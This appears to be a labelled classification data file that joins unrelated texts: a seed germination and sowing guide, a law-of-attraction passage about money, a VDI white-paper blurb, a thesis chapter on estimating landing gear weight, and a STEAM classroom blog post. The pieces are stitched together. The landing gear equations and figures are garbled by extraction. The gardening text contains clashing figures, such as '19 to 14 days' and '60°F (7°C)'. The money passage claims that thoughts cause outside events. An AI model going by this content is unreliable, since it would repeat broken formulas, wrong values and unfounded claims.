Biogas Production Process in India. Kale Kale Kale vegetable seed germination takes best in warm soil. Seed germinates will take 5 to 7 days at or near 70°F (21°C); sometimes seed can take up to two weeks to germinate if the soil is cold. Cover seeds with about half-inch of soil and don’t allow the seeds to dry out before germinating. Sow kale seed in early spring or late summer or a fall or winter crop. Sow seed ¼ inches to ½ inch (6-13mm) deep. Sow seeds 4 inches (10cm) apart; later thin seedlings to 16 inches to 18 inches (40-45cm) apart; use the thinning in salads. If sowing kale seed in summer for fall harvest, place the seed in a folded damp paper towel placed in a plastic bag and kept in the refrigerator for five days before sowing. Peas Peas Peas will sprout in 21 to 30 days if the soil temperature is 38°F and the germination rate, or a number of seeds that do sprout, will below. At temperatures of 65 to 70°F, the peas seeds will sprout within 7 to 14 days. Sow seeds outdoors 4 to 6 weeks before last spring frost date, when soil temperatures reach at least 45°F (7°C). Early sowing is done in October month whereas optimum varieties are sown in November in plains of North India. In the hills, the first crop of pea is sown from the middle of March to the end of May through a second crop is sown in autumn. Tomatoes Tomatoes Sowing tomato seeds must be done at the end of the winter, towards mid-March, indoors and with a temperature of around 65°F to 70°F (18°C to 20°C). Tomato seeds will commonly germinate within 5 to 10 days. Best to keep seed germination temperature range 70 to 80°F (21 to 27°C). The lower the temperature the slower the seed germination. However, temperatures range below 50°F (10°C) or above 95°F (35°C) are poor for germination. Sow seed in late February to mid-March using a heated propagator or a warm, south-facing windowsill. The temperature of the compost should be approx 22°C for the seeds to germinate; young plants will also want to be kept warm until early summer when the soil temperature is above at least 10 degrees.
You may be interested in
Chilli Farming Profit, Project Report. Onions Onions Onion seed germination would be faster with a temperature of 68 to 77°F (20-25°C), and with slight temperature drops at night. Warm soil temperatures, on the other hand, can trigger onion seed germinationin as little as 4 days. Sow seed ¼ to ½ (6-12 mm) inch deep; plant sets about one inch (2.5 cm) deep for large onions, 2 inches (5 cm) deep for green onions and space rows 12 inches (30 cm) apart. Onion seeds should germinate in 4 to 10 days at an optimal temperature of 70°F (21°C) or thereabouts; germination will take longer in colder soil however germination can be slow in chilly soil. Alfalfa Alfalfa Alfalfa can germinate at temperatures greater than 37°F but optimum seed germination temperature is between 65 and 77°F. As the soil warms, the rate of seed germination increases because of increased water movement into the seed and because of increases in the rate of other metabolic activities associated with germination. Alfalfa seed germination and seedling emergence occur in about three to seven days. Sowing is done in spring to summer. Cauliflower Cauliflower Cauliflower vegetable seed germinationusually takes eight to ten days. Sow cauliflower seeds half an inch deep and 2 to 3 inch apart. Thin plants to 15 to 24 inches apart; space rows 24 to 30 inches apart. The optimum soil temperature for seed germination temperature is 80°F. Though, cauliflower will germinate at temperatures as low as 50°F. Celery Celery Sow seed indoors 14 weeks to 6 weeks before the last spring frost. Set out seedlings when they reach three inches (8 cm) tall about the time of the last frost and sow seed ⅛ inch deep (3 mm). The seed will germinate in ten days; soak seed overnight in water before sowing. Celery seeds germinate best at 70 to 75°F during the day and 60 degrees at night. The best method to germinate celery seeds is by starting the plants indoors in seed flats. Celery seeds take 14 days to 21 days to germinate and emerge from the soil. Okra Okra The okra seeds generally germinate in 2 to 12 days. Okra seeds take 27 days to 30 days to germinate in the soil at 65°F. If the soil is 75°F, seed germination time is cut in half. Sow 3 to 4 seeds to a pot or across flats; then clip away the weaker seedlings once the strongest seedling is about two inches (5 cm) tall and sow seed ½ inch (13 mm) deep. Optimum soil temperature for germinating okra seed is 85°F (29°C). Moringa or drumstick Moringa or drumstick Soak moringa seeds in water for 24 hours for the quick germination process. The sowing season for drumstick as it is a warm-season plant, the drumstick tree is usually planted after the end of the cool season. The moringa plant will germinate within 12 days. The planting of drumstick is generally done during June after the first shower of rains. In the sowing method, the seeds should be planted in an area with light, dry soil, and placed in holes dug 30cm (1ft) deep and 30cm wide. In each plant 3 to 5 seeds at a distance of 5cm (2in) apart, and water the soil, such that the topsoil remains moist. Chicory Chicory Chicory seeds will germinate from 41-85°F (5-29°C), but the highest germination percentage will occur around 75°F (24°C), depending on the variety and seed lot. Sow seeds 6 seeds per foot, rows 12-18 inches apart. Cover seed lightly, about 1/8 inch, and firm soil gently. Dry soil should be watered to ensure coolness and moisture, and for uniform germination. Thin the seedlings 8 inches apart as soon as they are large enough to handle. Chicory can be direct seeded outdoors in the early spring season. Optimal soil temperatures for germination are 65 to 70°F and sow seeds ¼” deep in rows 20″ apart. Chicory seeds will germinate in 7 to 21 days. Watercress Watercress Sow watercress seeds outdoors in spring when the soil has warmed up; minimum temperature 8°C (46°F). Or watercress seeds can be sown directly into the containers where you want them to grow. To start off plants earlier in the year, sow seeds from mid-January to the end of March month in pots or trays of moist seed sowing compost. Watercress seeds will germinate in the soil about 7 to 14 days.
You may also check
Growing Curry Leaves from Cuttings, Seeds. Brinjal or Eggplant Brinjal or Eggplant Eggplant or brinjal seeds germinate in 7 to 14 days, depending on the heat, moisture provided, and moisture content and age of the seed. Eggplant seeds germinateat temperatures between 60-95°F. (15-35°C.) and seedlings will emerge in seven to ten days. Sow eggplant or brinjal seed ¼ to ½ inches deep spaced 4 to 5 inches apart. Eggplant seeds germinate in about five to six days. Cucumbers Cucumbers Sow cucumbers from the mid-spring season into small pots of seed starting or general-purpose potting mix. Sow two cucumber seeds about an inch (3cm) deep, and then water well. Cucumbers need temperatures to a range of at least 68ºF (20ºC) to germinate, so either place pots in a propagator for speedier germination, or simply wait until late spring to get started. Cucumber germination temperature range will be 60°F to 90°F and do not plant until soil reaches 65 F. Germination may take ten days or longer at cooler temperatures. Pumpkins Pumpkins Pumpkin vegetable seed germination takes place in 4 to 10 days at 85°F (29°C) or warmer. Sow pumpkins indoors two to three weeks before the last expected frost in spring the transplant them into the garden after all danger of frost has passed. Sow pumpkins outdoors when the soil temperature range has warmed to 70°F (21°C). Pumpkin seeds will not germinate at a soil temperature range below 66°F (18°C). Carrots Carrots Optimal soil temperature range will be 7-30°C (45-85°F). Carrot seeds take as long as 14 to 21 days to germinate. Because carrot seeds are tiny, they want to be sown shallowly. The trick is to maintain the top-most layer of soil damp during the long germination period. Direct sow April to mid-July for harvests from July to November month. Direct sow winter-harvest carrots in the first two weeks of August month. Sow at three-week intervals for a continuous harvest. Chard Chard Chard vegetable seed germination takes in 5 to 7 days at or near 60°F to 65°F (16-18°C) but sometimes seed can take up to three weeks to germinate if the soil is cold. Germination will not occur in soil chillier than temperature 50°F (10°C). Sow chard seeds ½ to 1 inch deep and 2 to 6 inches apart, in rows 18 to 24 apart. Sow seeds 1 inch (2.5cm) apart; later thin seedlings to 6 inches (15cm) apart; use the thinning in salads. Endive Endive Seed germinates about 19 to 14 days at or near 70°F (21°C) but sometimes seed can take up to 2 weeks to germinate if the soil is cold. Sow endive or escarole seedin the garden as early as four to six weeks before the average date of the last frost in spring. Endive seed started indoors for transplanting out can be sown 8 to 10 weeks before the average last frost. Sow endive seeds 1 to 2 inch (2.5-5 cm) apart; later thin seedlings to 6 to 9 inches (15-23 cm) apart. Sow seed ¼ inches (6 mm) deep. Arugula or Rocket Arugula or Rocket The arugula seeds take five to seven days to germinate in the soil at 40 to 55°F, but at room temperature, around 70°F, the seeds will germinate in a few days. Sow seeds 2 to 4 inches (5-10 cm) apart; later thin seedlings six inches (15 cm) apart and Sow seed ¼ inch (6 mm) deep. Arugula seed germinates in 5 to 7 days at or near 60°F (7°C) but the seed will germinate in the soil as chilly as 40°F (4°C). Keep the soil evenly moist until seeds germinate then maintain the soil moist until seedlings are well established. Turnips Turnips Turnip seeds can germinate at a temperature as low as 40°F. Sow the seeds about 1 inch apart and cover them with a 1/4- to half-inch layer of soil. Sow seed ½ (12 mm) inch deep and be sure to stamp the soil firmly in; turnips often fail to germinate when there is insufficient contact with the soil. Sow seed 2 inches apart and later thin to 4 inches to 6 inches (10-15 cm) apart for large storage turnips, and 2 to 4 inches apart for greens. The seeds should germinate in 3 to 10 days at an optimal temperature range of 70°F (21°C) or thereabouts; germination will take longer in colder soil. Sorrel Sorrel Sorrel can be grown from seed sown in the garden as early as 2 weeks to 3 weeks before the average last frost date in spring. Sow seeds for the sorrel plant in spring season when the soil has warmed up. Sow sorrel seed half an inch deep and 2 to 3 inches apart. Thin successful seedlings from 12 to 18 inches apart when plants are 6 to 8 weeks old. Space rows inch 18 to 24 inches apart. Tinda The soil temperature needs to be at least 25°C for the Tinda seeds to germinate. The Tinda vegetable seed germination takes place within the first 6 to 8 days. Sow the seeds on one side of the channel. And the seedlings after 15 days to maintain two/pit at 0.9 m spacing. The seed sowing to harvest time will be about 45 days. Soak the Tinda seeds overnight. Sow 2 to 3 seeds at a depth of about an inch (2-3 cm) keep damp.
You may be interested in
Smart Farming Techniques. Lentils Lentils Sow lentils in spring as early as two to three weeks before the average last frost date. Lentils can be started indoors before transplanting to the garden; lentil seeds will germinate in ten days at 68°F. Lentil is sown in the plot directly in seed holes in spring and is harvested in summer. Guar or cluster beans Guar or cluster beans During the rainy season, seeds are sown 2 to 3 cm (1 in) deep on ridges and in furrows during summer months. Guar must be planted when the soil temperature is above 70°F; the optimum soil temperature for germination is 86°F. Complete guar sowing time from mid-July to mid-August. Sowing use row to row distance of 30 cm and sow seeds at depth of 2-3 cm. For guar, sowing uses seed drill, Pora or Kera method. Basil Basil The optimal temperature for basil seed germination will be 21°C (70°F). Seeds should sprout in five to ten days and sow basil seeds one centimeter deep. Basil seeds take between 8 and 14 days to germinate and emerge from the soil. Basil seeds will germinate well as long as temperatures remain between 65 degrees Fahrenheit and 85 degrees Fahrenheit. Lavender Lavender Lavender seeds can take as long as a month to germination process, although sometimes they’ll sprout in as little as 14 days. Help the germination process by placing seed trays in a warm spot about 70 degrees F is an ideal temperature. Sow lavender seeds from February to July month on the surface of moist seed compost. Lavender seed germinates most evenly if the seeds can be collected in the autumn and sown on the surface of a seed tray with bottom heat maintaining 4 to 10°C (40-50°F). The seedlings will germinate in about 2 weeks and will take a while to look like lavender. Cilantro or Coriander Cilantro or Coriander Cilantro seeds germinate in about 7 to 10 days. Seeds will germinate with soil temperatures of 55 to 68 degrees Fahrenheit. Cilantro plants can withstand temperatures down to freezing. The Cilantro seeds will germinate within two or three weeks and quickly produce leafy growth. Sow coriander in spring as early as 2 to 3 weeks after the last expected frost date. Coriander is sown from late March until early September month.
That’s all about different types of vegetable seed germination process and sowing time.
You may be interested in
Growing Hydroponic Spring Onions.
|
__label__pos
| 0.887509
|
Well, yes and no. If we see money as the form of energetic exchange it is, then we perceive its value differently. In the material world, if we see money as something independent and solely as a tool for purchases, then we deceive ourselves in how we can associate money in an abundance mindset.
So many of us want to chalk our experiences up to others, but the reality of it is, our thoughts, words and actions are what translate to our reality. Ever thought of a person right before they called? Or envisioned a promotion that happened in the couple weeks following? That’s you calling things in because your emotions align with it. Just as we have days where we feel ‘everything bad is happening to us’ and then get pulled over with a speeding ticket, we can also rework the algorithm by changing that pattern and connecting to our happiness, experiencing better.
|
__label__pos
| 0.561225
|
Over the past few years, however, the endpoint computing model has begun to change in several ways. One visible new endpoint computing model is called Virtual Desktop Infrastructure (VDI). Instead of running the Windows operating system and applications and storing files locally on a physical PC device, VDI serves up desktop images as a managed service typically running on servers in data centers.
Is Virtual Desktop Infrastructure (VDI) gaining momentum or does it represent yet another empty threat to Wintel hegemony? VDI carries many benefits around business agility, but can be costly to deploy.
This white paper highlights:
Why many organizations are moving forward with VDI; The positives and negatives of VDI security; Why Organizations need VDI-centric endpoint security; How security impacts VDI costs and ROI.
|
__label__pos
| 0.814614
|
8.1. Introduction
Statistical weight equations, although capable of producing landing gear group weights
quickly and generally accurately, do not respond to all the variations in landing gear design parameters. In addition, the equations are largely dependent on the database of existing aircraft. For future large aircraft, such weight data is virtually non-existent. Thus, it is desirable that an analytical weight estimation method which is more sensitive than statistical methods to variations in the design of the landing gear should be adopted. The objectives are to allow for parametric studies involving key design considerations that drive landing gear weight, and to establish crucial weight gradients to be used in the optimization process. Based on the procedures described in this chapter, algorithms were developed to size and estimate the weight of the structural members of the landing gear. The weight of non- structural members were estimated using statistical weight equations. The two were then combined to arrive at the final group weight.
72
thus are able to produce estimates which reflect the effect of varying design parameters to some extent. Actual and estimated landing gear weight fractions are presented in Fig. 8.1. Figure 8.1a provides comparisions for estimates which only use MTOW. Figure 8.1b provides comparisions with methods which take into account more details, specifically the gear length. As shown in Fig. 8.1a, for an MTOW up to around 200,000 lb, the estimated values from ACSYNT and Torenbeek are nearly equal. However, as the MTOW increases, completely different trends are observed for the two equations: an increasing and then a decreasing landing gear weight fraction is predicted by ACSYNT, whereas a continual increasing weight fraction is predicted by Torenbeek. As for the Douglas equation, an increasing weight fraction is observed throughout the entire MTOW range. Upon closer examination of the data presented, it was found that only a small number of actual landing gear weight cases are available to establish trends for aircraft takeoff weight above 500,000 pounds. In addition, even within the range where significant previous experience is available, the data scatter between actual and estimated values is too large to draw conclusions on the accuracy of existing weight equations. Evidently a systematic procedure is needed to validate the reliability of the statistical equations, and provide another level of estimation.
73
5.00 ACSYNT
2.00
105 106 107 MTOW, lb
5.00
Raymer Weight fraction, %MTOW
4.50 FLOPS
B737 DC9 4.00 B727 B707 3.50 L1011 DC10 3.00 B747 C5 2.50
2.00
105 106 107 MTOW, lb
74
8.3.1 Generic Landing Gear Model A generic model consisting of axles, truck beam, piston, cylinder, drag and side struts, and trunnion is developed based on existing transport-type landing gears. Since most, if not all, of the above items can be found in both the nose and main gear, the model can easily be modified to accommodate both types of assembly without difficulty. Although the torsion links are presented for completeness, they are ignored in the analysis since their contributions to the final weight are minor. The model shown in Fig. 8.2 represents a dual-twin-tandem configuration. The model can be modified to represent a triple-dual-tandem or a dual-twin configuration with relative ease, i.e., by including a center axle on the truck beam, or replacing the bogie with a single axle, respectively. The model assumes that all structural components are of circular tube construction except in the case of the drag and side struts, where an I-section can be used depending on the configuration. When used as a model for the nose gear, an additional side strut arranged symmetrically about the plane of symmetry is included.
75
For added flexibility in terms of modeling different structural arrangements, the landing gear geometry is represented by three-dimensional position vectors relative to the aircraft reference frame. Throughout the analysis, the xz-plane is chosen as the plane of symmetry with the x-axis directed aft and the z-axis upward. The locations of structural components are established by means of known length and/or point locations, and each point-to-point component is then defined as a space vector in the x, y, and z directions. Based on this approach, a mathematical representation of the landing gear model is created and is shown in Fig. 8.3. z C
A
Vector Description D BA Forward trunnion BC Aft trunnion x BE Cylinder K AE Drag strut y J DE Side strut E EF Piston L FG, FJ Truck beam F GH, GI, JK, JL Axles H G I Figure 8.3 Mathematical representation of the landing gear model
76
Table 8.1 Basic landing gear loading conditions [20] Dynamic Static Three-point level landing Turning One-wheel landing Pivoting Tail-down landing Lateral drift landing Braked roll The corresponding aircraft attitudes are shown in Fig. 8.4, where symbols D, S and V are the drag, side and vertical forces, respectively, n is the aircraft load factor, W is aircraft maximum takeoff or landing weight, T is the forward component of inertia force, and I is the inertial moment in pitch and roll conditions necessary for equilibrium. The subscripts m and n denote the main and nose gear, respectively.
nW I
0.8Fn 0.8Fm
Fn Fm
nW I
Fm
b) One-wheel landing
Figure 8.4 Aircraft attitudes under dynamic and static loading conditions [20]
77
nW I α 0.8Fm Fm
c) Tail-down landing
nW I
0.8Fm 0.6Fm
Fm Fn Fm
W I
0.8Fn 0.8Fm
Fn Fm
e) Braked roll
f) Turning
Figure 8.4 Aircraft attitudes under dynamic and static loading conditions [20] (continued)
78
W
Fm Fn Fm
g) Pivoting
Figure 8.4 Aircraft attitudes under dynamic and static loading conditions [20] (concluded)
For the dynamic landing conditions listed in Table 8.1, the total vertical ground reaction
(F) at the main assembly is obtained from the expression [43]
cW Vs2
F= + S cosα (8.1) ηS cos α g where c is the aircraft weight distribution factor, η is the gear efficiency factor, S is the total stroke length, α is the angle of attack at touchdown, Vs is the sink speed, and g is the gravitational acceleration. Although the vertical force generated in the gear is a direct function of the internal mechanics of the oleo, in the absence of more detailed information Eq. (8.1) provides a sufficiently accurate approximation. The maximum vertical ground reaction at the nose gear, which occurs during low- speed constant deceleration, is calculated using the expression [5, p. 359]
lm + ax / g hcg
Fn = W (8.2) lm + ln For a description of variables and the corresponding values involved in Eq. (8.2), refer to Chapter Four, Section Two. The ground loads are initially applied to the axle-wheel centerline intersection except for the side force. As illustrated in Fig. 8.5, the side force is placed at the tire-ground contact point and replaced by a statically equivalent lateral force in the y direction and a couple whose magnitude is the side force times the tire rolling radius.
79
z z
T
y ⇒ y S V S V
To determine the forces and moments at the selected structural nodes listed in Table
8.2, the resisting force vector (F res ) is set equal and opposite to the applied force vector (F app) Fres = − Fapp (8.3)
whereas the resisting moment vector (M res ) is set equal and opposite to the sum of the
applied moment vector (M app) and the cross product of the space vector (r) with F app
(
Mres = − Mapp + r × Fapp ) (8.4)
80
8.3.3.1. Coordinate Transformation Given that the mathematical landing gear model and the external loads are represented in the aircraft reference frame, transformation of nodal force and moment vectors from the aircraft to body reference frames are required prior to the determination of member internal reactions and stresses. The body reference frames are defined such that the x3-axis is aligned with the component’s axial centerline, and xz-plane is a plane of symmetry if there is one. The transformation is accomplished by multiplying the force and moment vectors represented in the aircraft reference frame by the transformation matrix LBA [45, p. 117] FB = L BA FA (8.5) M B = LBA M A (8.6) where subscripts A and B denote the aircraft and landing gear body reference frames, respectively. By inspection of the angles in Fig. 8.7, where subscripts 1, 2, and 3 denote the rotation sequence from the aircraft (x, y, and z) to the body (x3, y3, and z3) reference frame, the three localized transformation matrices are [45, p. 117]
1 0 0
L1 (ϕ 1 ) = 0 cosϕ 1 sinϕ 1 (8.7a) 0 − sinϕ 1 cosϕ 1
cos ϕ 2 0 − sinϕ 2
L2 (ϕ 2 ) = 0 1 0 (8.7b) sin ϕ 2 0 cos ϕ 2
cos ϕ 3 sin ϕ 3 0
L3 (ϕ 3 ) = − sin ϕ 3 cos ϕ 3 0 (8.7c) 0 0 1
or
81
sin ϕ 1 sinϕ 2 cos ϕ 3 − cos ϕ 1 sin ϕ 2 cosϕ 3 cos ϕ 2 cos ϕ 3 + cos ϕ1 sin ϕ 3 + sinϕ 1 sinϕ 3 L BA = − sinϕ 1 sinϕ 2 sin ϕ 3 cos ϕ1 sin ϕ 2 sinϕ 3 (8.9) − cosϕ 2 sin ϕ 3 + cos ϕ 1 cos ϕ 3 + sin ϕ1 cosϕ 3 sinϕ 2 − sinϕ 1 cos ϕ 2 cos ϕ1 cos ϕ 2
z
z1 y1 ϕ1 ϕ1 y
x, x1
z1 y1, y2
ϕ2 z2
ϕ2
x1 x2 b) About the y1, y2-axis y3 y2 ϕ3
z 2, z 3
ϕ3
x3
x2
82
The main assembly drag strut and side strut structure is modeled as a space truss consisting of ball-and-socket joints and two-force members. As shown in Fig. 8.7 the loads applied to the cylinder consist of the side strut forces (F side ), drag strut force (F drag), an applied force with components F x, F y, and F z, and an applied couple with moment components Cx, Cy, and Cz. Internal axial actions are obtained using the method of sections. Equilibrium equations are then used to determine the magnitude of the internal axial forces in the isolated portion of the truss. The shock strut cylinder, in addition to supporting the vertical load, also resists a moment due to asymmetric ground loads about the z-axis. This moment is transmitted from the truck beam assembly to the cylinder though the torsion links. Note that in the tandem configurations, the moment about the y-axis at the piston-beam centerline is ignored because of the pin-connection between the two. However, this moment must be considered in the dual-twin configuration, where the moment is resisted by the integrated axle/piston structure. z y x Fside Trunnion connection Cylinder
Fdrag
Fx Fy
Cx Cy Fz
Cz
83
8.3.3.3. The Nose Assembly As mentioned in the geometric definition section, an additional side strut, arranged symmetrically about the xz-plane, is modeled for the nose assembly. The addition of the second side strut results in a structure that is statically indeterminate to the first degree as shown in Fig. 8.8. The reactions at the supports of the truss, and consequently the internal reactions, can be determined by Castigliano’s theorem [46, p. 611] ∂U n Fl ∂F uj = = ∑ ii i (8.10) ∂Pj i=1 Ai E ∂Pj
where uj is the deflection at the point of application of the load P j, E is the modulus of
elasticity, and l, F, and A are the length, internal force, and cross-sectional area of each member, respectively. The theorem gives the generalized displacement corresponding to the redundant, P j, which is set equal to a value compatible with the support condition. This permits the solution of the redundant, and consequently all remaining internal actions, via equilibrium. As detailed in Appendix B, Section Two, the procedure is to first designate one of the reactions as redundant, and then determine a statically admissible set of internal actions in terms of the applied loads and the redundant load. By assuming a rigid support which allows no deflection, Eq. (8.10) is set to zero and solved for P j. z y x Fside Trunnion connection
Cylinder
Fdrag Fside
Fx Fy
Cx Cy Fz
Cz
84
8.3.3.4. The Trunnion
Cz
x Cy
Fz Fy l1 Fx
85
8.3.4. Member Cross-sectional Area Sizing With the resolution of various ground loads, each structural member is subjected to a number of sets of internal actions that are due to combinations of extension, general bending, and torsion of the member. To ensure that the landing gear will not fail under the design condition, each structural member is sized such that the maximum stresses at limit loads will not exceed the allowables of the material and that no permanent deformation is permitted. A description of selected cuts near major component joints and supports is given in Table 8.3. Normal and shear stresses acting on the cross section due to the internal actions were calculated at these locations and used in the sizing of the required member cross- sectional area. Table 8.3 Sections description Section Description Location (Figure 8.3) 1 Axle-beam centerline intersection G/J 2 Beam-piston centerline intersection F 3 Piston E 4 Cylinder/struts connection E 5 Cylinder/trunnion centerline intersection B 6 Forward trunnion mounting A 7 Aft trunnion mounting C 8 Drag strut A 9 Side strut D
The normal stresses induced on the structural members are determined by combining
the effects of axial load and combined bending, while the shear stresses are determined by combining the effects of torsion and shear forces due to bending [47]. The normal stress (txx) due to combined axial force and bending moments is given as N My M τ xx = + z− z y (8.11) A Iyy Izz
where N is the maximum axial force, A is the cross-sectional area of the member, My and
Mz are the internal moment components, and Iyy and Izz are the second area moments about the y- and z-axis, respectively. As shown in Appendix B, Section Four, the extremum values of the normal stress on a circular-tube cross section under combined axial and bending actions are
86
N 1 τ xxmax = ± 2 M 2y + M 2z (8.12) or A πr t min
where r is the mean radius of the tube and t is the wall thickness. In the case of drag and
side struts, the last two terms in Eq. (8.11) are zero since both members are modeled as pin-ended two-force members, thus, N τ xx = (8.13) A The shear stress(τ xs) due to combined transverse shear forces and torque is given as q(s) τ xs = + (τ xs )torque (8.14) t where q is the shear flow due to bending of a thin-walled tube, see Fig. 8.10. Given that V tanθ max = − z (8.15) Vy
where θ max is the polar angle where the bending shear flow attains an extremum value and
Vy and Vz are the shear forces components, Eq. (8.14) then becomes 1 T τ xsmax = ± Vy2 + Vz2 (8.16) or π rt 2r min
where T is the applied torque. Details of the solution are given in Appendix B, Section
Four. F qdx ds dx z q(s) s
F+dF qodx
x y
87
8.3.4.2. Design Criteria Although aircraft structural design calls for multiple load paths to be provided to give fail-safe capability, the concept cannot be applied in the design of the landing gear structures. Accordingly, the gear must be designed such that the fatigue life of the gear parts can be safely predicted or that the growth of cracks is slow enough to permit detection at normal inspection intervals [4]. Von Mises yield criterion for ductile materials combined with a factor of safety is used to determine the stress limit state. The Mises equivalent stress is given as [46, p. 368]
and the factor of safety is defined as the ratio of the yield stress of the material to the Mises
equivalent stress, that is, σ yield F .S.= (8.18) σ Mises
If this value is less than the specified factor of safety, the cross-sectional area of the
component is increased until the desired value is attained. In addition to material limit state, the critical loads for column buckling of the drag and side struts are considered because of the large slenderness ratio associated with these members. The slenderness ratio is defined as the length of the member (L) divided by the minimum radius of gyration (ρ min). Assuming a perfectly aligned axial load, the critical buckling load for a pin-ended two-force member can be calculated using Euler’s formula [46, p. 635] π 2EI Ncr = 2 (8.19) L
where E is the modulus of elasticity. In the case of a member with circular cross section,
the moment of inertia I of the cross section is the same about any centroidal axis, and the member is as likely to buckle in one plane as another. For other shapes of the cross section, the critical load is computed by replacing I in Eq. (8.19) with Imin, the minimum second moment of the cross section (bending about the weak axis). Note that the Euler’s formula only accounts for buckling in the long column mode and is valid for large slenderness ratio, e.g., L/ρ min > 80 for 6061-T6 Aluminum alloy. For slenderness ratio below this range, intermediate column buckling should be considered [48]. 88 8.3.4.3. Sizing of the Cross-sectional Area For thin-walled circular tubes, the cross-sectional area of the member is given as A = πDt (8.20)
where the mean diameter (D) and design thickness (t) are both design variables. Instead of
using these two variables in the analysis directly, the machinability factor (k), which is defined as the mean diameter divided by the wall thickness, is introduced to account for tooling constraints [49]. The factor is defined as D k= (8.21) t
and has an upper limit of 40. For the thin-wall approximation to be valid in the structural
analysis k > 20. Thus, the machinability factor is limited to
20 ≤ k ≤ 40 (8.22)
By replacing t in Eq. (8.20) with Eq. (8.21) and using D as a limiting design variable, the
desired cross-sectional area can then be determined by iterating on k. Note that the lower limit of k given in Eq. (8.21) may be violated in some instances. For structural members such as the axles, the truck beam, and piston, which typically feature k values in the mid- teens, St. Venant’s theory for torsion and flexure of thick-walled bars [50] should be used to calculate shear stresses. Essentially, the problem is broken down into torsion and bending problems and the shear stresses are calculated separately based on the linear theory of elasticity. In general, the diameter of each cylindrical component is a function of either the piston or wheel dimension. In the case of shock strut, it is assumed that the internal pressure is evenly distributed across the entire cross-sectional area of the piston. That is, the piston area is a function of the internal oleo pressure (P 2) and the maximum axial force, that is, N πDp 2 A= = (8.23) P2 4 where Dp is the outer diameter of the piston. Rearrangement of Eq. (8.23) gives 4N Dp = (8.24) πP2
89
Assuming a perfect fit between the piston lining and the inner cylinder wall, the minimum allowable mean diameter of the cylinder is obtained by adding the wall thickness of the cylinder to the piston outer diameter. To reduce the level of complexity, the minimum allowable mean diameter of the trunnion is assumed to be identical to that of the cylinder. Similar assumptions are made concerning the axle and truck beam, except that the outer diameter of the above members is treated as a function of the diameter of the wheel hub. In the case of the axle, the maximum allowable mean diameter is obtained by subtracting the axle wall thickness from the hub diameter. For the thin-walled I-section bar shown in Fig. 8.11, the cross-sectional area and principal centroidal second area moments are
A = t (2b + h) (8.25)
h 3 h 2
I yy = t + 2b (8.26) 12 2
and
b3t I zz = (8.27) 6
where h is the web height and b is the width of the two flanges. Assume that Iyy > Izz ,
algebraic manipulations then result in h > 2 (8.28) b
and the z-axis is the weak axis in bending. The cross-sectional area is related to the second
area moment by the minimum radius of gyration, that is, I A = 2zz (8.29) ρ min or for the I-section b ρ min = (8.30) 12 + 6 h / b
90
z
h y
b
Figure 8.5 I-section truss bar
Since only the cross-sectional area is used in the weight computation, it is not necessary
to determine the actual dimensions of the sectional height and width. Instead, one of the dimensions, usually the height, is treated as a function of the piston diameter and the other is then calculated with a predetermined h/b ratio.
The final step of the analytical procedure is to calculate the weight of each member
based on its cross-sectional area, length, and the material density. Recall that seven different loading conditions were examined in the analysis, which results in seven sets of cross- sectional areas for each member. To ensure that the component will not fail under any of the seven loading conditions, the maximum cross-sectional area from the sets is selected as the final design value. Component weights are then calculated by multiplying each of the cross-sectional areas by the corresponding length and material density. The summation of these calculations then becomes the structural weight of the idealized analytical model. 8.3.6. Validation of the Analysis
For analysis validation purposes, the landing gears for the Boeing Models 707, 727,
737 and 747 were modeled and analyzed. The estimated structural weight, which includes the axle/truck, piston, cylinder, drag and side struts, and trunnion, accounts for roughly 75 percent of the total structural weight that can be represented in the model [43]. The remaining 25 percent of the gear structural weight is made up of the torsion links, fittings, miscellaneous hardware, and the internal oleo mechanism, e.g., the metering tube, seals, oil, pins, and bearings. Note that actual and estimated structural weights presented in Tables 8.4 and 8.5 only account for the components that were modeled in the analysis.
91
Table 8.4 Main assembly structural weight comparison Aircraft Estimated, lb Actual, lb Est/Act B737 784 768 1.02 B727 1396 1656 0.84 B707 2322 2538 0.91 B747 9788 11323 0.86
Differences between the actual and estimated structural weights can be attributed to
several factors. First, the models analyzed are extremely simple, i.e., structural members were represented with simple geometric shapes and no considerations have been given to fillet radii, local structural reinforcement, bearing surfaces, etc. As for the analysis itself, simplistic equations were used to calculate the applied static and dynamic loads, and idealized structural arrangements were used to determine the member internal reactions. However, it should be noted that the results are consistent with Kraus’ original analysis; where an average of 13 percent deviation was cited [43].
92
eliminates the need to resort to an analytical method [App. A]. A detailed weight breakdown is provided in Table 8.6; the values are presented in terms of percent total landing gear weight.
Using the combined analytical and statistical approach presented here, the landing gear
group weight for the Boeing Models 707, 727, 737, and 747 were calculated and compared with actual values. As presented in Table 8.7a, the analysis tends to underestimate the group weight as the aircraft takeoff weight increases. Linear regression analysis was used to calibrate the estimated group weights (West) so they agree with the actual values. Correction factors were calculated using the expression
where W is the aircraft weight. The correction factor is then combined with West to arrive at
the calibrated landing gear group weight (Wcal ), that is,
93
Table 8.7 Landing gear group weight comparison a) Estimated group weight Aircraft Estimated, lb Actual, lb Est/Act B737 4479 4382 1.02 B727 5976 6133 0.97 B707 9510 11216 0.85 B747 27973 31108 0.90
94
|
__label__pos
| 0.854024
|
Levers and Pulleys and Wedges, oh my! This week put all of the student’s STEAM skills to the test. The students also had their resolve tested, and had to show grit and resilience by not giving up.
The day started with one of the toughest Instant Challenges yet! The students had to design a structure that was built as far above and below the top of a table as possible. It was only allowed to touch the table within a 30cm by 30cm square. The structure had to be self-supporting and could not be held up by a team member. The materials available were very limited – 1 pipe cleaner, 3 cups, 2 straws, a paper plate, 15cm of string, 2 elastics, and 2 mailing labels. They also had a very strict time limit. The structures were also scored on three factors: the height of the structure, if the structure extended at least 15cm above and 15cm below the top of the table, and how well the teams worked together. The students also had to estimate the total height of the structure and received additional points if they were within 10cm of the actual measurement. We discussed what the groups thought they did well, what they could change, and if they used any strategies to build their structures. The students thought it was an easier challenge than the previous ones, but I questioned whether it was easier or if they had become more skilled at completing the challenges.
After the challenge, we read a book called “Rosie Revere, Engineer”. The book was about a young girl who dreamed of becoming an engineer. She would make gadgets and gizmos from anything she could find. Dissuaded by what she thought was her uncle laughing at a creation, she almost gave up on engineering until she met her great-aunt Rose. She rekindled her love of tinkering and continued her engineering dream. She learned the mantra of STEAM – the only time that you truly fail is if you quit.
